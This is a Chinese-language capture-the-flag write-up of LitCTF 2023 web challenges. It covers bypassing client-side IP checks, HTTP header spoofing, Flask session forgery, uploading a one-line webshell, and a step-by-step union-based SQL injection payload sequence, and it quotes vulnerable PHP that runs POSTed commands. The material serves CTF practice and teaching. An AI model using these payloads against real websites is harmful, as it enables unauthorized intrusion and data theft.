WEB
[LitCTF]我Flag呢?
这题直接 查看源码就好
[LitCTF]导弹迷踪
两种解法
第一种玩到第六关就可以直接出flag 不是很难
或者第二种
先死一次
去找js代码中的CRASHED
var Messages = {
START: {
title: getLevelString,
text: function () {return 'CLICK TO BEGIN';}
},
CRASH: {
title: function () {return 'CRASHED';},
text: function () {return 'CLICK TO RETRY';}
},
GAME_OVER: {
title: function () {return 'GAME OVER';},
text: function () {return 'CLICK TO START AGAIN';}
},
FINISH: {
title: function () {return 'LEVEL COMPLETED';},
text: function () {if (mLevel === 6) {return 'GOT F|L|A|G {y0u_w1n_th1s_!!!}';} else {return 'CLICK TO CONTINUE';}},
}
};
[LitCTF]Follow me and hack me
一个get和post传参
[LitCTF] PHP是世界上最好的语言!!
直接调用 这一题进去的时候我一直以为和json有关 忘记是php语言了 テ_デ
[LitCTF]Ping
源码中有判断IPv4的格式
function check_ip(){
let ip = document.getElementById('command').value;
let re = /^(25[0-5]|2[0-4]\d|[0-1]\d{2}|[1-9]?\d)\.(25[0-5]|2[0-4]\d|[0-1]\d{2}|[1-9]?\d)\.(25[0-5]|2[0-4]\d|[0-1]\d{2}|[1-9]?\d)\.(25[0-5]|2[0-4]\d|[0-1]\d{2}|[1-9]?\d)$/;
F12
<form action="" method="POST" onsubmit="return check_ip()">
<input id="command" name="command" type="text" placeholder="Enter an IP address">
删除check
<form action="" method="POST" >
<input id="command" name="command" type="text" placeholder="Enter an IP address">
[LitCTF]Vim yyds
标题可知 vim泄露
扫一下
藏在./index.php.swp
php
$password = "Give_Me_Your_Flag";
if ($_POST['password'] === base64_encode($password)) {
eval(system($_POST['cmd']));
echo "<p>Oh You got my password!</p>";
}
代码审计
先将Give_Me_Your_Flag进行base64加密 在使用命令查询
[LitCTF]作业管理系统
ctrl u 后得到用户名和密码 都是admin
文件上传
上传一句话木马 这里没有任何的过滤
蚁剑连接
[LitCTF] Http pro max plus
考点http协议伪造
只允许本地访问
Client-ip : 127.0.0.1
You are not from pornhub.com !
Referer : pornhub.con
用Chrome浏览器啊!
User-Agent : Chrome
不开代理你想上p站?
via : Clash.win
到这个页面
正经人从不看色图(手动狗头)
CTRL U
[LitCTF 2023]这是什么?SQL !注一下 !
尝试数字1 2 3
除了3 其他都有回显 2 是彩蛋
库
3)))))) union select,1,2 #
表
3)))))) union select 1,database()#
列
3)))))) union select 1 ,group_concat(table_name) from information_schema.tables where table_schema='ctf'#
3)))))) union select 1 ,group_concat(column_name) from information_schema.columns where table_name='users'#
没有flag
进行跨库注入
3)))))) union select 1 ,group_concat(schema_name) from information_schema.schemata#
是在ctftraining
重复之前的步骤就行了
3)))))) union select 1 ,group_concat(flag) from ctftraining.flag#
[LitCTF 2023] 1zjs
进去玩了一圈发现没有啥用
查看源码
在js源码中搜php
进去后是这个
丢到控制室跑一下
[LitCTF 2023]就当无事发生
https://ProbiusOfficial.github.io
进去看看
浏览一圈没有发现
再去GitHub看看
GitHub里搜索ProbiusOfficial
找到ProbiusOfficial.github.io
进去就是flag
[LitCTF 2023]彩蛋
我flag呢
位于js源码中
Follow me and hack me
题目解答出后会提示“备份文件还有好吃的” 访问“/www.zip”下载备份文件 下载完成后打开“index.php” 得到
作业管理系统
访问页面中url My_pic/demo.jpg at main · ProbiusOfficial/My_pic · GitHub
就可以得到
狠狠的注入
输入 2 就可以得到
[LitCTF 2023]Flag点击就送!
这里传什么 都会显示是
传入burp
看到了cookie的值是session
现学现搜
Flask之session伪造_HackerTenG的博客-CSDN博客
运用到了一个工具
GitHub - noraj/flask-session-cookie-manager: Flask Session Cookie Decoder/Encoder
密钥因为没给 所以直接尝试LitCTF
解密后 将name后值改成admin 在加密回去 传参就解决了
最后 get/flag
第一次web ak 有点激动
不足之处 欢迎大家留言补充